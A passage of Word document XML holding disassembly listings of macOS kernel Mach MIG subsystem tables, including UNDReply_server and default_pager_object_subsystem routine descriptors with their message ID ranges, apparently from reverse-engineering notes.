      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E01240                                         ; UNDReply_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E01240                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1838h</w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 183Ah  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dd 2Ch                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dq offset _XUNDAlertCompletedWithResult_rpc; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dd 4                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dq 2D002000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dd 2                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRDefault="00D060FE" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>efault_pager_object_subsystem</w:t>
      </w:r>
      <w:r w:rsidR="00ED4A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 public default_pager_object_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068 ; const default_pager_object_subsystem default_pager_object_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068 default_pager_object_subsystem_0 dq offset default_pager_object_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E01068                                         ; DATA XREF: default_pager_object_server_routine:loc_FFFFFF80002CA972o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                                         ; default_pager_object_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E01068                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1991">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8E3h</w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E01068                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1991">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">8EEh </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 80h                  ; maxsize</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0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq offset _Xdefault_pager_object_create; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 4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34h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0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 2CAB6000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 2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4h, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 44h                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 2CACF0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E01068                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 5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5400000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 0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2CAF70h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 4FFFFFF80h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0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 40h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0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 0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2CB19000000000h      ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 0FFFFFF80h           ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 db 4, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E01068                 dq 4                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 34h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2CB350h              ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 db 80h, 3 dup(0FFh)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 1FFFFFF80h           ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 0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2Ch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0A0h, 0B4h, 2Ch, 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq offset _Xdefault_pager_backing_store_info; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 4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80h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2CB68000000000h      ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 5FFFFFF80h           ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 0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lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E01068                 dq 2C00000000h          ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dq offset _Xdefault_pager_triggers; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01068                 dd 5                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
